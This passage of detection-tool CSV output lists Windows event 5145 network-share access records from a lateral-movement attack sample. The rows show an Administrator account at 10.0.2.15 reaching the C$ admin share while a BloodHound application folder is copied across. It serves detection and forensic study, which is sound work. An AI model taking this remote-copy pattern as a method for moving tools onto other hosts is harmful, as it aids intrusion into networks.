10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator 
: Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share 
File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: 